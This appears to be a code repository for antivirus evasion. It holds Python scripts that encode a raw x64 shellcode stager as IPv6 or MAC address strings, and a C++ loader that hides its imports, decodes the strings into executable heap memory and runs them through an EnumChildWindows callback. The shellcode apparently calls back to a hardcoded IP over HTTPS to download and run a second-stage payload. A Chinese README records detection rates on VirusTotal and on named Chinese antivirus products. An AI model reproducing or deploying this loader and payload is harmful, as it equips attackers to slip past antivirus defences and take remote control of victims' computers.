ee\x61\x4c\xe1\x39\x0e\x0c\xc6\x37\xa3\xe3\xa4\x27\xb1\x72\xec\xb0\xf3\xfb\x9c\x79\x79\xf5\x60\x77\x73\xcd\xc5\x73\x61\x01\x09\xb5\xc3\x75\x70\xa9\xb1\x4e\xa2\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' 4 | 5 | def convertToIPV6(shellcode): 6 | if len(shellcode)%16 !=0: 7 | print("\n[*] length:",len(shellcode)+(16-(len(shellcode)%16))) 8 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 9 | shellcode += addNullbyte 10 | 11 | ipv6 = [] 12 | for i in range(0, len(shellcode), 16): 13 | ipv6.append(str(ipaddress.IPv6Address(shellcode[i:i+16]))) 14 | return ipv6 15 | # \x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff\xff => 4831:c948:81e9:c0ff:ffff:488d:5ef:ffff\x00 16 | 17 | 18 | if __name__ == '__main__': 19 | r = convertToIPV6(buf) 20 | print(str(r).replace("'","\"")) 21 | -------------------------------------------------------------------------------- /callback/v0.3/trans.py: -------------------------------------------------------------------------------- 1 | import ipaddress 2 | 3 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x6c\x7a\x36\x41\x00\xf7\x60\x59\x6d\x9c\x78\x07\x14\x7f\x90\x3c\xb5\xf2\xd1\x99\x9d\x91\xc2\x66\xc4\x6e\x17\x3f\xb8\x43\xb3\xee\x45\x28\xef\x8f\xce\x7b\x5b\x06\x91\x2c\x2e\xa4\x2a\xe7\x68\xde\xb9\xf2\x82\xde\xae\x9e\x91\xe7\xf5\x30\x38\x9f\x6b\xe4\x40\x5a\x07\xbc\xcf\x15\x91\x99\xe0\x5f\x94\x3e\x00\xa5\x0f\xfd\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x41\x52\x4a\x53\x29\x0d\x0a\x00\x71\xe4\xfb\xc4\x3a\xc6\x6a\x35\x0e\x94\xd6\xd4\x36\x78\xf7\x49\x9d\x55\x26\x95\xac\x46\xfb\x05\x6a\xf6\x58\x5c\x9f\x31\x8b\xee\x43\x2e\xf9\xf0\x8c\x6a\x48\x6a\xf0\xe8\x89\x88\x15\x32\x17\x6b\xe5\x58\x01\xb7\x6c\xb0\x96\xc4\x7f\x49\x51\x34\x28\x5e\xb9\x98\x7c\x4d\xba\x1c\xe2\x35\x45\x25\x71\xda\x4b\x1f\x7f\x67\xb7\x7d\x9e\xb0\xa8\x7f\x0b\xed\x8a\x5c\x12\xa9\x62\x5a\x09\x81\xb7\xb9\x10\xb3\x8b\xdd\x98\xe9\x6f\x62\x1e\xa9\x89\x2f\xfa\x9f\x26\x66\x16\xb1\x3b\xd0\xb0\xc3\x32\xb1\xe0\x0d\xf9\xa3\x41\x00\x23\xd0\x71\x71\xc0\x1a\x73\xf1\x40\x04\x3b\xae\x57\x16\x7c\x42\x0c\x48\x31\x97\x60\x7a\xac\x60\xc5\xc7\x85\x62\xba\xbc\xef\xfe\x62\xa4\x7d\x0e\x79\x75\x4b\x47\xb8\x6d\x42\x48\xdf\x4a\x33\x64\xd0\x86\x3b\x29\xb1\x9b\xde\xdc\x9a\xb6\xcc\x1c\x36\xde\x51\x0c\x4f\xa4\x83\x85\x85\xaf\x7d\x23\x1c\x56\xdb\x86\xbe\x91\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' # shellcode 4 | 5 | 6 | def convertToIPV6(shellcode): 7 | if len(shellcode)%16 !=0: 8 | print("\n[*] length:",len(shellcode)+(16-(len(shellcode)%16))) 9 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 10 | shellcode += addNullbyte 11 | 12 | ipv6 = [] 13 | for i in range(0, len(shellcode), 16): 14 | ipv6.append(str(ipaddress.IPv6Address(shellcode[i:i+16]))) 15 | return ipv6 16 | # \x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff\xff => 4831:c948:81e9:c0ff:ffff:488d:5ef:ffff\x00 17 | 18 | 19 | if __name__ == '__main__': 20 | r = convertToIPV6(buf) 21 | print(str(r).replace("'","\"")) 22 | -------------------------------------------------------------------------------- /callback/v0.4/trans.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | def convertToMAC(shellcode): 4 | if len(shellcode) % 6 != 0: 5 | print("\n[*] length:", len(shellcode) + (6 - (len(shellcode) % 6))) 6 | addNullbyte = b"\x00" * (6 - (len(shellcode) % 6)) 7 | shellcode += addNullbyte 8 | 9 | mac = [] 10 | for i in range(0, len(shellcode), 6): 11 | tmp_mac = "" 12 | for j in shellcode[i:i + 6]: 13 | if len(hex(j).replace("0x", "")) == 1: 14 | tmp_mac = tmp_mac + "0" + hex(j).replace("0x", "").upper() + "-" 15 | else: 16 | tmp_mac = tmp_mac + hex(j).replace("0x", "").upper() + "-" 17 | mac.append(tmp_mac[:-1]) 18 | return mac 19 | 20 | 21 | 22 | if __name__ == '__main__': 23 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x63\x38\x4c\x76\x00\xcf\x83\xc4\xc5\xe2\x7b\xbc\xfa\x0b\x48\xad\x2d\x24\x9c\x96\xd2\xf6\xe3\x59\x00\x16\xac\xd4\x03\x90\x9c\x84\x68\x08\x57\x3d\x55\xf7\x95\x27\xcf\x2c\xab\x24\xab\xda\x4e\xa3\xcc\x7e\xcc\xe9\xa8\xf3\x43\x24\x8c\x90\xfa\x5f\x79\x0a\x32\x09\x38\xb2\x0d\x66\x27\xe5\x54\xb4\xa4\xcd\x9a\x2d\x7c\x78\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x0d\x0a\x00\x14\x0c\x23\x96\x4b\x6e\xa9\xc4\x84\xb0\x7f\x9d\x6d\xcc\x6e\xfb\x89\x44\x9c\x96\x36\x25\x28\xbe\x62\xe5\x4f\x5f\x56\xf0\x93\x01\x73\x0c\xf7\xce\x6a\x5b\x86\x97\xdd\xaa\xb3\x02\x9f\xdc\xc5\x18\x6e\x7d\x0b\x90\x8f\xd5\xb7\x11\xbc\x73\x40\x9e\x76\x15\x95\xfe\xf1\x2c\x97\xc5\x03\xad\xd7\xb2\x62\xfe\xe4\xea\xa8\x56\xbf\xe1\xe3\x7d\x7d\x70\xa4\xc5\x2c\x07\x67\xbf\x29\x4b\x0a\x6a\x06\xfc\x41\x0d\x68\x33\x1b\x46\x5a\x12\x14\x0b\x19\xb8\x02\xc8\xf1\x1e\xe7\xe4\x9e\x99\x87\x98\x81\xc8\xc8\x28\x88\x99\xa8\x5d\x3f\xe9\x31\x16\x37\xb6\x70\x8c\x0f\x65\x98\x06\x09\xd8\xf7\xcf\x40\xb8\x25\xa6\x03\x8e\xa4\x4b\x94\x16\x70\x77\xf4\xa0\x3b\xd9\x3d\x46\xb1\x1d\xc0\xa2\x20\x7f\xca\xa4\xc8\x7d\x2d\x43\x76\xe7\x5c\x9f\xfb\x6e\xb2\x60\x71\x2f\x58\xd9\x7a\xbb\xb2\xee\xb0\x2f\x52\x6d\x6f\xcd\x4d\x6c\x6f\x5a\x22\xf2\xf8\xdf\xeb\x7a\xa7\x3e\x37\x3b\x52\xde\x73\x6b\x6f\x1f\x97\x31\x49\xd4\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' 24 | u = convertToMAC(buf) 25 | print(str(u).replace("'","\"")) 26 | -------------------------------------------------------------------------------- /hide_Import_tables/v0.4/trans.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | def convertToMAC(shellcode): 4 | if len(shellcode) % 6 != 0: 5 | print("\n[*] length:", len(shellcode) + (6 - (len(shellcode) % 6))) 6 | addNullbyte = b"\x00" * (6 - (len(shellcode) % 6)) 7 | shellcode += addNullbyte 8 | 9 | mac = [] 10 | for i in range(0, len(shellcode), 6): 11 | tmp_mac = "" 12 | for j in shellcode[i:i + 6]: 13 | if len(hex(j).replace("0x", "")) == 1: 14 | tmp_mac = tmp_mac + "0" + hex(j).replace("0x", "").upper() + "-" 15 | else: 16 | tmp_mac = tmp_mac + hex(j).replace("0x", "").upper() + "-" 17 | mac.append(tmp_mac[:-1]) 18 | return mac 19 | 20 | 21 | 22 | if __name__ == '__main__': 23 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x4c\x70\x58\x49\x00\xdf\xe6\x55\x0b\xc7\x0b\x19\x4d\xb4\x74\x8f\x06\x89\x8a\x62\x17\x8f\xc2\x8a\xc8\x21\xa0\x1b\x2e\x3f\xf9\xcf\x4b\x32\x72\xe2\xe9\x74\x2d\x6c\x32\xf5\xd2\x0e\xca\xb1\x8a\x0a\xc6\xf2\xf8\xec\xe0\x5c\x80\x5e\x86\x62\x24\x8d\x0a\x10\x51\xd6\xda\xaf\x84\xce\x8a\x8a\xa7\xfa\x78\x18\x97\xbc\xb0\x50\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x47\x57\x4a\x53\x29\x0d\x0a\x00\xce\x75\x8d\xfb\x7d\xdb\xd6\x05\x1b\xcb\xc5\x45\xfa\x7e\x21\x5f\xe5\xc3\x0b\x88\xf3\x22\xf4\x2b\xf7\x55\xfa\x5c\x6e\xbd\xde\x31\x99\xbb\xef\x1a\x1e\xee\xb9\x3a\xb1\x56\xbc\xb1\x46\x56\x80\xb3\xf1\x7b\x88\x93\xa2\x76\x7a\x59\x95\x4a\x67\x06\x2d\xcb\x36\xb2\x51\x85\x83\xb8\xfc\x59\x57\xe8\x5b\x21\x57\xa2\x1f\xc0\x5f\x03\x10\xe1\x85\x04\xb0\x60\xe6\xe7\xa7\x98\x52\x32\x40\x44\x47\xdb\x61\xb7\x11\x42\x5a\xf2\x20\x06\xb7\xc6\x9a\x26\xed\x5e\x9a\xfd\x87\x9e\x73\x66\xa9\xe9\xf5\x95\xc7\x74\x63\x4d\x2d\xab\x13\x00\xf5\xe6\x80\x00\xf4\x69\xc8\x55\xde\xe6\x9d\x77\x2c\xb7\x1c\xaf\x22\xe9\xa7\xfc\x1c\x37\xe7\xe9\xd6\xd1\x8e\xfe\x30\xae\x21\x9f\xdd\xe9\xdc\x62\xbc\xfd\xf2\x68\x93\xee\x61\x4c\xe1\x39\x0e\x0c\xc6\x37\xa3\xe3\xa4\x27\xb1\x72\xec\xb0\xf3\xfb\x9c\x79\x79\xf5\x60\x77\x73\xcd\xc5\x73\x61\x01\x09\xb5\xc3\x75\x70\xa9\xb1\x4e\xa2\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' 24 | u = convertToMAC(buf) 25 | print(str(u).replace("'","\"")) 26 | -------------------------------------------------------------------------------- /hide_Import_tables/v0.3/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #pragma comment(lib, "Ntdll.lib") 5 | 6 | 7 | const char* ipv6[] = 8 | { 9 | "fc48:83e4:f0e8:c800:0:4151:4150:5251", "5648:31d2:6548:8b52:6048:8b52:1848:8b52", "2048:8b72:5048:fb7:4a4a:4d31:c948:31c0", "ac3c:617c:22c:2041:c1c9:d41:1c1:e2ed", "5241:5148:8b52:208b:423c:4801:d066:8178", "180b:275:728b:8088:0:48:85c0:7467", "4801:d050:8b48:1844:8b40:2049:1d0:e356", "48ff:c941:8b34:8848:1d6:4d31:c948:31c0", "ac41:c1c9:d41:1c1:38e0:75f1:4c03:4c24", "845:39d1:75d8:5844:8b40:2449:1d0:6641", "8b0c:4844:8b40:1c49:1d0:418b:488:4801", "d041:5841:585e:595a:4158:4159:415a:4883", "ec20:4152:ffe0:5841:595a:488b:12e9:4fff", "ffff:5d6a:49:be77:696e:696e:6574:41", "5649:89e6:4c89:f141:ba4c:7726:7ff:d548", "31c9:4831:d24d:31c0:4d31:c941:5041:5041", "ba3a:5679:a7ff:d5e9:9300:0:5a48:89c1", "41b8:bb01:0:4d31:c941:5141:516a:341", "5141:ba57:899f:c6ff:d5eb:795b:4889:c148", "31d2:4989:d84d:31c9:5268:32:c084:5252", "41ba:eb55:2e3b:ffd5:4889:c648:83c3:506a", "a5f:4889:f1ba:1f00:0:6a00:6880:3300", "49:89e0:41b9:400:0:41ba:7546:9e86", "ffd5:4889:f148:89da:49c7:c0ff:ffff:ff4d", "31c9:5252:41ba:2d06:187b:ffd5:85c0:f85", "9d01:0:48ff:cf0f:848c:100:eb:b3e9", "e401:0:e882:ffff:ff2f:4c70:5849:df", "e655:bc7:b19:4db4:748f:689:8a62:178f", "c28a:c821:a01b:2e3f:f9cf:4b32:72e2:e974", "2d6c:32f5:d20e:cab1:8a0a:c6f2:f8ec:e05c", "805e:8662:248d:a10:51d6:daaf:84ce:8a8a", "a7fa:7818:97bc:b050:55:7365:722d:4167", "656e:743a:204d:6f7a:696c:6c61:2f35:2e30", "2028:636f:6d70:6174:6962:6c65:3b20:4d53", "4945:2031:302e:303b:2057:696e:646f:7773", "204e:5420:362e:323b:2057:4f57:3634:3b20", "5472:6964:656e:742f:362e:303b:204d:4147", "574a:5329:d0a:ce:758d:fb7d:dbd6:51b", "cbc5:45fa:7e21:5fe5:c30b:88f3:22f4:2bf7", "55fa:5c6e:bdde:3199:bbef:1a1e:eeb9:3ab1", "56bc:b146:5680:b3f1:7b88:93a2:767a:5995", "4a67:62d:cb36:b251:8583:b8fc:5957:e85b", "2157:a21f:c05f:310:e185:4b0:60e6:e7a7", "9852:3240:4447:db61:b711:425a:f220:6b7", "c69a:26ed:5e9a:fd87:9e73:66a9:e9f5:95c7", "7463:4d2d:ab13:f5:e680:f4:69c8:55de", "e69d:772c:b71c:af22:e9a7:fc1c:37e7:e9d6", "d18e:fe30:ae21:9fdd:e9dc:62bc:fdf2:6893", "ee61:4ce1:390e:cc6:37a3:e3a4:27b1:72ec", "b0f3:fb9c:7979:f560:7773:cdc5:7361:109", "b5c3:7570:a9b1:4ea2:41:bef0:b5a2:56ff", "d548:31c9:ba00:40:41:b800:1000:41", "b940:0:41:ba58:a453:e5ff:d548:9353", "5348:89e7:4889:f148:89da:41b8:20:0", "4989:f941:ba12:9689:e2ff:d548:83c4:2085", "c074:b666:8b07:4801:c385:c075:d758:5858", "4805::50c3:e87f:fdff:ff31:2e31", "352e:3830:2e31:3032:49:9602:d200:0" 10 | }; 11 | 12 | typedef HANDLE(WINAPI* ImportHeapCreate)( 13 | _In_ DWORD flOptions, 14 | _In_ SIZE_T dwInitialSize, 15 | _In_ SIZE_T dwMaximumSize 16 | ); 17 | 18 | typedef LPVOID(WINAPI* ImportHeapAlloc)( 19 | _In_ HANDLE hHeap, 20 | _In_ DWORD dwFlags, 21 | _In_ SIZE_T dwBytes 22 | ); 23 | 24 | typedef NTSTATUS(NTAPI* ImportRtlIpv6StringToAddressA)( 25 | _In_ PCSTR S, 26 | _Out_ PCSTR* Terminator, 27 | _Out_ struct in6_addr* Addr 28 | ); 29 | 30 | typedef BOOL(WINAPI* ImportEnumChildWindows)( 31 | _In_opt_ HWND hWndParent, 32 | _In_ WNDENUMPROC lpEnumFunc, 33 | _In_ LPARAM lParam 34 | ); 35 | 36 | 37 | 38 | 39 | int main() 40 | { 41 | ImportHeapCreate MyHeapCreate = (ImportHeapCreate)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapCreate"); 42 | ImportHeapAlloc MyHeapAlloc = (ImportHeapAlloc)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapAlloc"); 43 | 44 | HMODULE hModule = LoadLibraryA("ntdll.dll"); 45 | ImportRtlIpv6StringToAddressA MyRtlIpv6StringToAddressA = (ImportRtlIpv6StringToAddressA)GetProcAddress(hModule, "RtlIpv6StringToAddressA"); 46 | 47 | HMODULE hModule2 = LoadLibraryA("USER32.dll"); 48 | ImportEnumChildWindows MyEnumChildWindows = (ImportEnumChildWindows)GetProcAddress(hModule2, "EnumChildWindows"); 49 | 50 | 51 | HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); 52 | void* ha = HeapAlloc(hc, 0, 0x100000); 53 | DWORD_PTR hptr = (DWORD_PTR)ha; 54 | int elems = sizeof(ipv6) / sizeof(ipv6[0]); 55 | PCSTR Terminator = ""; 56 | 57 | for (int i = 0; i < elems; i++) { 58 | 59 | if (MyRtlIpv6StringToAddressA(ipv6[i], &Terminator, (in6_addr*)hptr) == STATUS_INVALID_PARAMETER) 60 | { 61 | printf("ERROR!"); 62 | return 0; 63 | } 64 | hptr += 16; 65 | } 66 | 67 | MyEnumChildWindows(NULL, (WNDENUMPROC)ha, 0); 68 | CloseHandle(ha); 69 | return 0; 70 | } 71 | -------------------------------------------------------------------------------- /callback/README.md: -------------------------------------------------------------------------------- 1 | # 免杀方式:回调函数 2 | 3 | 4 | 5 | ## 编译环境: 6 | 7 | VS2022、Windows SDK 10.0、C++14 8 | 9 | 10 | 11 | ## 目录 12 | 13 | | 版本号 | 写入内存方式 | VT查杀率 | 时间 | 火绒 | 360 | 腾讯 | 代码 | 14 | | ------ | ------------------------------------ | -------- | ---------- | ---- | ---- | ---- | ---- | 15 | | 0.1 | uuid转化(UuidFromStringA) | 4/68 | 2022-02-18 | √ | √ | √ | c++ | 16 | | 